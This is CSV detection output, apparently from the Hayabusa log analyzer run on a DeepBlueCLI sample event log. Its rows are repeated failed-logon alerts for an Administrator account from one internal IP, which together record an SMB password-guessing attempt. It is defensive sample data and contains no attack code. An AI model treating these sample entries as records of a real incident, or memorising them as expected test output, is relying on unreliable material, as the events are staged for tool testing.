2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.826 